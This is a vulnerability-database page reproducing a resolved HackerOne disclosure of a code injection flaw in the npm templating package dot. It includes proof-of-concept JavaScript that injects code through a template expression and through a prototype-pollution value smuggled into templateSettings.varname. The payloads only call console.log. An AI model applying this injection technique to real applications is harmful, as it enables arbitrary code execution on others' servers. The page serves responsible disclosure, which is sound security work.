Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Code Injection Vulnerability in dot Package

High
N
Node.js third-party modules
Submitted None
Actions:
View on HackerOne
Reported by cris_semmle

Vulnerability Details

Technical details and impact analysis

Code Injection
I would like to report a code injection vulnerability in dot. It allows attackers to execute arbitrary JS code, especially when combined with a prototype pollution attack. # Module **module name:** dot **version:** 1.1.2 **npm page:** `https://www.npmjs.com/package/dot` ## Module Description Created in search of the fastest and concise JavaScript templating function with emphasis on performance under V8 and nodejs. It shows great performance for both nodejs and browsers. doT.js is fast, small and has no dependencies. ## Module Stats 76,838 downloads in the last week # Vulnerability ## Vulnerability Description dot uses Function() to compile templates. this can be exploited by the attacker if she can control the template or if she can control the value set on Object.prototype. ## Steps To Reproduce: a) The basic attack vector ```js var doT = require("dot"); var tempFn = doT.template("<h1>Here is a sample template " + "{{=console.log(23)}}</h1>"); tempFn({}) ``` b) in combination with a prototype pollution attack - create a folder "resources" and inside that a file called "mytemplate.dot" with the following content: ```html <h1>Here is a sample template</h1> ``` - in the folder containing the resources folder, create and execute the following js file ```js var doT = require("dot"); // prototype pollution attack vector Object.prototype.templateSettings = {varname:"a,b,c,d,x=console.log(25)"}; // benign looking template compilation + application var dots = require("dot").process({path: "./resources"}); dots.mytemplate(); ``` Even though the template compilation + application looks safe, due to the prototype pollution, the attacker can execute arbitrary commands. ## Patch N/A remove Function() call # Wrap up - I contacted the maintainer to let them know: N - I opened an issue in the related repository: N ## Impact The attacker can achieve code injection/RCE if she can control the template or if she can set arbitrary properties on Object.prototype. Using Function() with runtime computed values is rarely safe.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection